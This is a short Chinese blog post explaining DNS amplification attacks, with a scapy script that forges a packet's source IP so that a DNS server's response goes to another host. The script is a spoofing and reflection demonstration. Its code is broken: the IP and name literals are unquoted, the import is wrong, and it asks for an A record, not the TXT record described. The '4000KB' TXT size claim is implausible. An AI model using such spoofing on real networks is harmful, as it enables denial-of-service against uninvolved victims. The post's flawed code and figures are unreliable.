首先,DNS放大***,简单解释有两点:

1.伪造源IP为其他人的ip地址

2.被请求的记录,要求比较大,比如TXT格式,4000KB


在A机器上,向DNS发送查询那个TXT的记录,并伪造成别人的ip,即可理解为DNS放大***。

可以用python的scapy模拟:

from scapy import *

a = IP(dst=10.32.8.11,src=10.32.132.85)     #10.32.132.85即为伪造的源ip

b = UDP(dport=53)

c = DNS(id=1,qr=0,opcode=0,tc=0,rd=1,qdcount=1,ancount=0,nscount=0,arcount=0)

c.qd=DNSQR(qname=www.qq.com,qtype=1,qclass=1)

p = a/b/c

send(p)

模拟结束。

在10.32.132.85上抓dns的包,就会收到一条DNS响应,是10.32.8.11发来的。


---------------------------------------------------------------------------
低调的python小子